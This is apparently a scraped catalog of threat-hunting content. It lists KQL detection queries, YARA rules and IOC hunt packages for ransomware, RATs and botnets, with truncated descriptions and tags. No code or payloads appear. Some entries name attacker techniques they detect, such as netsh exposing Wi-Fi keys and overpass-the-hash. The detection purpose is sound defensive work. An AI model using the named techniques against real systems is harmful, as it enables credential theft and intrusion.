URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as 176-65-139-219

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 192-159-99-249

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 71 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 45-88-186-114

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 14 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as sh

iocurlhaus
Vbr
yara low
Yara-Rules source

YARA rule: Vbr

community
wadhrama-ransomware
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, RDP ransomware persists as Wadhrama. The ransomware known as Wadhrama has been used in human-operated attacks that follow a particul

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
Tt1574
DeviceFileEvents

This query looks for malicious file creations via a TOCTOU vulnerability in leading Endpoint Detection and Response (EDR) and Antivirus (AV) solutions. - Microsoft Defender (CVE-2022-37971) - Defender for Endp

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Get all filtering events done by the Windows filtering platform. This includes any blocks done by Windows Firewall rules, but also blocks triggered by some 3rd party firewalls. When no Firewall rules

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceProcessEventsDeviceRegistryEvents

This query looks for persistence or privilege escalation done using Windows Accessibility features. It covers some of the techniques that could be used to utilize these features for malicious purpose

huntingmicrosoftofficialpersistence
Azure-Sentinel source
DeviceLogonEvents

Query #1: Look for public IP addresses that failed to log on to a computer multiple times, using multiple accounts, and eventually succeeded.

huntingmicrosoftofficial
Account brute force
kql medium
Azure-Sentinel source
DeviceLogonEvents

Query #1: Look for public IP addresses that failed to log on to a computer multiple times, using multiple accounts, and eventually succeeded.

huntingmicrosoftofficial
Azure-Sentinel source
IdentityDirectoryEvents

This query lists Active Directory account lockout and unlock events.

huntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

Added credential from country X and signed in from country Y in a specific time window: This query tries to find all applications to which credentials were added from country X while the applicatio

credential-thefthuntingmicrosoftofficial
Yara-Rules source

Rule to detect the crypto library used in Equation group malware

community
Yara-Rules source

Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW

community
Yara-Rules source

Rule to detect the EquationLaser malware

community
Yara-Rules source

Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW

communityexploit
Yara-Rules source

Rule to detect Equation group's keyword in executable file

community
Backdoored ssh
yara low
Yara-Rules source

YARA rule: Backdoored_ssh

backdoorcommunity
backup-deletion
kql medium
Azure-Sentinel source

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse

huntingmicrosoftofficialransomware
Azure-Sentinel source
EmailAttachmentInfo

Check if file hashes published in the recent abuse.ch feed are found in your mail flow scanned by Office 365 ATP.

huntingmicrosoftofficial
Create account (1)
kql medium
Azure-Sentinel source
DeviceEvents

User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/Technique/T1136. Tags: #CreateAccount. Query #1: Query for users being created using "ne

huntingmicrosoftofficialpersistence
Create account
kql medium
Azure-Sentinel source
DeviceProcessEvents

User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/Technique/T1136. Tags: #CreateAccount. Query #1: Query for users being created using "ne

huntingmicrosoftofficialpersistence
Azure-Sentinel source
CloudAppEvents

Credentials were added to an application by UserA, after the application was granted admin consent rights by UserB. The Nobelium activity group has been observed adding credentials (x509 keys or passwo

aptcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

View Defender for Endpoint telemetry URLs and their connection status, and view the trendline over 30 days. Use to investigate possible telemetry and/or connectivity issues.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
EmailUrlInfo

One of the tricks used in phishing is obfuscating the domain name in a URL by using the @ symbol. This technique goes all the way back to the original RFC for URLs, RFC 1738. When you specify an @ in

evasionhuntingmicrosoftofficialphishing
Azure-Sentinel source
T1546.003
DeviceEvents

This query looks for signs of Impacket wmipersist usage and should work for other WMI-based persistence methods. Requires analysis. Author: Jouni Mikkola. More info: https://threathunt.blog/impacket-pa

huntingmicrosoftofficialpersistencewmi
detect-mailsniper
kql medium
Azure-Sentinel source
DeviceNetworkEventsDeviceProcessEvents

This query was originally published in the threat analytics report, MailSniper Exchange attack tool. MailSniper is a tool that targets Microsoft Exchange Server. The core function is to connect to Exc

backdoorcredential-thefthuntingmicrosoftofficial
detect-prifou-pua
kql medium
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in the threat analytics report, ironSource PUA & unwanted apps impact millions. IronSource provides software bundling tools for many popular legitimate apps, such a

huntingmicrosoftofficialpersistence
Azure-Sentinel source
DeviceNetworkEvents

This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEventsIdentityLogonEvents

Device Logons from Unknown IP Addresses. This query identifies device logons from IP addresses not associated with any machine in Defender ATP.

huntingmicrosoftofficial
doppelpaymer-psexec
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu

backdoorcredential-thefthuntinglateral-movementmicrosoftofficialransomware
Yara-Rules source

Equation Group Malware - DoubleFantasy

community
Yara-Rules source

Equation Group Malware - EoP package and malware launcher

community
Yara-Rules source

Equation Group Malware - EquationDrug installer LUTEUSOBSTOS

community
Yara-Rules source

Equation Group Malware - EquationLaser Installer

community
Yara-Rules source

Equation Group Malware - Fanny Worm

community
Yara-Rules source

Equation Group Malware - Grey Fish

community
Yara-Rules source

Equation Group Malware - GROK keylogger

communityinfostealer
Yara-Rules source

Equation Group Malware - HDD reprogramming module

community
Yara-Rules source

Equation Group Malware - suspicious string found in sample

community
Yara-Rules source

Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW

community
Yara-Rules source

Equation Group Malware - TripleFantasy Loader

community
Yara-Rules source

EquationDrug - Unilay.DLL

community
Yara-Rules source

EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys

community
Yara-Rules source

EquationDrug - HDD/SSD firmware operation - nls_933w.dll

backdoorcommunity
Yara-Rules source

EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys

community
Yara-Rules source

EquationDrug - Key/clipboard logger driver - msrtvd.sys

community
Yara-Rules source

EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys

backdoorcommunity
Yara-Rules source

EquationDrug - Network Sniffer - tdip.sys

community
Yara-Rules source

EquationDrug - Network Sniffer - tdip.sys

community
Yara-Rules source

EquationDrug - Network-sniffer/patcher - atmdkdrv.sys

community
Yara-Rules source

EquationDrug - Network-sniffer/patcher - atmdkdrv.sys

community
Yara-Rules source

EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll

backdoorcommunity
Yara-Rules source

EquationDrug - Collector plugin for Volrec - msrstd.sys

community
Azure-Sentinel source
DeviceFileEventsEmailAttachmentInfo

This query checks devices for the presence of files that have been sent by a known malicious sender. To use this query, replace the email address with the address of the known malicious sender.

huntingmicrosoftofficial
Yara-Rules source

FiveEyes QUERTY Malware - file 20121.xml

community
Yara-Rules source

FiveEyes QUERTY Malware - file 20123.xml

community
Yara-Rules source

FiveEyes QUERTY Malware - file 20121.dll.bin

community
Yara-Rules source

FiveEyes QUERTY Malware - file 20123_cmdDef.xml

community
Yara-Rules source

FiveEyes QUERTY Malware - file 20123.sys.bin

community
Azure-Sentinel source
AlertEvidence, DeviceLogonEvents

Microsoft Defender for Identity raises alert on suspicious Kerberos ticket, pointing to a potential overpass-the-hash attack. Once attackers gain credentials for a user with higher privileges, they wi

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
EmailAttachmentInfo, EmailEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents, DeviceLogonEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents, DeviceProcessEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
jar-attachments
kql medium
Azure-Sentinel source
EmailAttachmentInfo, EmailEvents

This query was originally published in the threat analytics report, Adwind utilizes Java for cross-platform impact. Adwind is a remote access tool (RAT) that takes advantage of the cross-platform capa

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

This query looks for a local admin account used to log on to the computer. This can help detect malicious insiders who were able to add a local account to the local admin group offline.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents, IdentityInfo

Author: alex verboon @alexverboon. Blogpost: https://www.verboon.info/2020/09/hunting-for-local-group-membership-changes.

huntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

Looks for multiple users that had their admin role removed by a single user within a certain period.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

This query looks for a large number of network-based authentications using local credentials coming from a single source IP address. High counts of logons involving a large number of distinct machines

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

This query will find when a new credential is added to an application or service principal. The Nobelium activity group was able to gain sufficient access to add credentials to existing applications w

aptbackdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents, IdentityInfo

Under some circumstances only users from country X are allowed to log on to devices in country X. This query finds logons by users from countries other than X. The query requires a property to i

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents, IdentityLogonEvents

Non-local logons with the built-in administrator (-500) account.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
EmailUrlInfo

This query was originally published on Twitter, by @MsftSecIntel. The query helps detect emails associated with a campaign that has used open redirector URLs. The campaign's URLs begin with the distin

huntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceRegistryEvents

This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware. Qakbot is malware that steals login credentials from banking and financial services. It has

backdoorcredential-thefthuntingmicrosoftofficialpersistenceransomware
Azure-Sentinel source
DeviceFileEvents, DeviceProcessEvents

This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is

backdoorhuntingmicrosoftofficialransomware
Azure-Sentinel source
T1543, T1543.003
DeviceFileEvents, DeviceImageLoadEvents, DeviceNetworkEvents, DeviceProcessEvents

This query is looking for rarely seen processes which are launched as a service. Author: Jouni Mikkola More info: https://threathunt.blog/rare-process-launch-as-a-service/

huntingmicrosoftofficial
Azure-Sentinel source
T1053
DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceLogonEvents, DeviceNetworkEvents, DeviceProcessEvents, DeviceRegistryEvents

Looks for rare process launches as a scheduled task and activity done by those processes. Author: Jouni Mikkola More info: https://threathunt.blog/hunting-for-malicious-scheduled-tasks/

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, Ryuk ransomware. There is also a related blog. Ryuk is human-operated ransomware. Much like DoppelPaymer ransomware, Ryuk is spread

backdoorhuntinglateral-movementmicrosoftofficialransomware
Azure-Sentinel source
CloudAppEvents

Looks for a new device registration in Entra ID preceded by a medium- or high-risk sign-in session for the same user within a maximum 6h timeframe.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents, DeviceLogonEvents

Service Accounts Performing Remote PowerShell. Author: miflower. The purpose behind this detection is for finding service accounts that are performing remote PowerShell sessions. There are two phases

huntingmicrosoftofficialpowershell
Azure-Sentinel source
AlertEvidence, DeviceEvents, EmailEvents, IdentityInfo

This query correlates Microsoft Defender for Office 365 signals and Microsoft Entra ID identity data to find the relevant endpoint event BrowserLaunchedToOpen in Microsoft Defender ATP. This event refl

huntingmicrosoftofficialphishing
ThreatFox: Antidot IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 68 IOCs associated with Antidot

apk-antidotiocthreatfox
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Dofloo IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 5 IOCs associated with Dofloo

elf-doflooiocthreatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

The Mirai malware compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for

elf-miraiiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 7 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 4 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 35 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 7 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 11 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 12 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 9 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

DarkComet is a remote access Trojan (RAT) that enables attackers to exfiltrate data, execute commands, and

iocthreatfoxwin-darkcomet
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 3 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Quasar RAT is a remote access trojan that enables adversaries to execute commands, exfiltrate data, and maintain persistence on infected systems. It typically

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 22 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 6 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox: Satacom IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents, UrlClickEvents

Hunt package for 5 IOCs associated with Satacom

iocthreatfoxwin-satacom
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Sliver

iocthreatfoxwin-sliver
ThreatFox source
DnsEvents

ValleyRAT is a Remote Access Trojan designed to exfiltrate data and provide adversaries

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Vidar is a data exfiltration malware designed to steal credentials and sensitive information from infected systems, often leveraging encrypted communication channels to avoid detection. It typically arrives via phishing emails containing malicious attachments or links to compromised domains and URLs, which deploy the malware through exploit kits or credential stealer

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with VShell

iocthreatfoxwin-vshell
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse

huntingmicrosoftofficialransomware
Azure-Sentinel source
CloudAppEvents

This query looks for users performing file deletion activities. Spikes in file deletion observed from risky sign-in sessions are flagged here. This applies to SharePoint and OneDrive users. Audit even

huntingmicrosoftofficial
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 49 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

This malware family is designed to exfiltrate sensitive data and execute arbitrary code on infected Android devices

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

The botnet malware is designed to establish persistent command-and-control (C2) communication, enabling remote control, data ex

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 8 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 13 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 13 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 11 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as opendir

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as wraith

iocurlhaus
Azure-Sentinel source
T1566.002
DeviceEvents

This query identifies when a user clicks a link that opens a browser to navigate to a URL which uses redirection. It then filters out any redirections to URLs in the same DNS namespace as the originat

huntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, RDP ransomware persists as Wadhrama. The ransomware known as Wadhrama has been used in human-operated attacks that follow a particul

backdoorcredential-thefthuntingmicrosoftofficialransomwarewmi
wifikeys
kql medium
Azure-Sentinel source
DeviceProcessEvents

Detects if someone runs netsh and tries to expose WPA keys in clear text. @mattiasborg82. Blog.sec-labs.com.

huntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

Determines DeviceId from internal IP address and outputs all alerts in events table associated to the DeviceId. Example use case is Firewall determines Internal IP with suspicious network activity. Qu

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

One of the challenges in making an AppLocker policy is knowing where applications launch from. This query normalizes process launch paths through aliasing, then counts the number of processes launche

huntingmicrosoftofficial
Baseline Comparison
kql medium
Azure-Sentinel source
AlertEvidence, DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceLogonEvents, DeviceNetworkEvents, DeviceProcessEvents, DeviceRegistryEvents

Baseline Comparison. Author: miflower. The purpose of this query is to perform a comparison between "known good" machines and suspected bad machines. The original concept for this query was born due t

huntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

This query identifies crashing processes based on parameters passed to werfault.exe and attempts to find the associated process launch from DeviceProcessEvents.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query is a function that consumes the publicly available Azure IP address list and checks a list of remote IP addresses against it to see if they are Azure IP addresses or not. To use this, repla

huntingmicrosoftofficial
Azure-Sentinel source

This query will count the number of devices in Defender ATP based on their DNS suffix. For a full list of devices with the DNS suffix, comment out or remove the last line.

huntingmicrosoftofficial
Azure-Sentinel source

This query calculates device uptime based on periodic DeviceInfo, which is recorded every 15 minutes regardless of the device's network connectivity and uploaded once the device gets online. If its interval is

backdoorhuntingmicrosoftofficial
EmojiHunt
kql medium
Azure-Sentinel source
DeviceProcessEvents

Did you know you can use emojis in Windows? Read more here: https://davidzych.com/abusing-emoji-in-windows. Check out who in your organization has renamed his or her computer to a Pizza or to a smili

huntingmicrosoftofficial
Azure-Sentinel source

This query will provide a report of many of the best practice configurations for Defender ATP deployment. Special Thanks to Gilad Mittelman for the initial inspiration and concept. Any tests which are

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence, DeviceLogonEvents

This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event

huntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence, DeviceLogonEvents

This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

This query looks for events that are near in time to a detected event. It shows how you could avoid typing exact timestamps, and replace it with a simple query to get the timestamp of your pivot event

huntingmicrosoftofficial
Azure-Sentinel source
DeviceLogonEvents

Sample query to detect if there are more than 3 failed logon authentications on high-value assets. Update DeviceName to reflect your high-value assets. For questions @MiladMSFT on Twitter or milad.asl

huntingmicrosoftofficial
File footprint (1)
kql medium
Azure-Sentinel source
DeviceNetworkEvents

Query #1 - Find the machines on which this file was seen. TODO - set file hash to be a SHA1 hash of your choice...

huntingmicrosoftofficial
File footprint
kql medium
Azure-Sentinel source
DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceNetworkEvents, DeviceProcessEvents, DeviceRegistryEvents

Query #1 - Find the machines on which this file was seen. TODO - set file hash to be a SHA1 hash of your choice...

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

This query helps you design client firewall rules based on data stored within DeviceNetworkEvents. Folder paths are aliased to help represent the files making or receiving network connections without

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
EmailEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of

huntingmicrosoftofficial
Azure-Sentinel source

This query uses the public MDE GitHub repo as a source to estimate the time that an agent build remains supported based on the time it was uploaded. Please note that the timestamps used in this query

backdoorhuntingmicrosoftofficial
Azure-Sentinel source

The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What

apthuntingmicrosoftofficial
Azure-Sentinel source

The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What

apthuntingmicrosoftofficial
Azure-Sentinel source

The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What

apthuntingmicrosoftofficial
Azure-Sentinel source

The following queries pivot from an IP address assigned to a machine to the relevant machine or logged-on users. To read more about it, check out this post: https://techcommunity.microsoft.com/t5/What

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This is a completely stupid and pointless query that makes Vogon poetry out of a random FolderPath from the table you pass it. You can change DeviceProcessEvents for any table as long as it has a col

huntingmicrosoftofficial
Azure-Sentinel source

This query will identify the Microsoft Defender Antivirus Engine version and Microsoft Defender Antivirus Security Intelligence version (and timestamp), Product update version (aka Platform Update ver

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Description: The query looks for several different MITRE techniques, grouped by risk level. A weighting is applied to each risk level and a total score calculated per machine. Techniques can be added

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Query 1 shows you any network communication that happened from endpoints to a specific Remote IP or Remote URL. Be sure to update the RemoteIP and RemoteURL variables. For questions @MiladMSFT on Twitter or mila

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents, DeviceNetworkEvents

Query 1 shows you any network communication that happened from endpoints to a specific Remote IP or Remote URL. Be sure to update the RemoteIP and RemoteURL variables. For questions @MiladMSFT on Twitter or mila

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Query 1 shows you any network communication that happened from endpoints to a specific Remote IP or Remote URL. Be sure to update the RemoteIP and RemoteURL variables. For questions @MiladMSFT on Twitter or mila

huntingmicrosoftofficial
Network footprint
kql medium
Azure-Sentinel source
DeviceNetworkEvents

Query 1 shows you any network communication that happened from endpoints to a specific Remote IP or Remote URL. Be sure to update the RemoteIP and RemoteURL variables. For questions @MiladMSFT on Twitter or mila

huntingmicrosoftofficial
Azure-Sentinel source

Get information about the network adapters of the given computer at the given time. This could include the configured IP addresses, DHCP servers, DNS servers, and more.

apthuntingmicrosoftofficial
Azure-Sentinel source
EmailEvents

How many phishing and malware emails versus good emails the user received in the given timeframe.

huntingmicrosoftofficial
Services
kql medium
Azure-Sentinel source
DeviceRegistryEvents

Gets the service name from the registry key.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Establishes a baseline SystemGuardSecurityLevel and shows the devices that are below that baseline. See https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/How-insights-from-system-attestatio

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Goal: Find machines in the last N days where the SystemGuardSecurityLevel value NOW is less than it was BEFORE. Step 1: Get a list of all security levels in the system where the level is not null.

huntingmicrosoftofficial
ThreatFox: Antidot IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 68 IOCs associated with Antidot

apk-antidotiocthreatfox
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

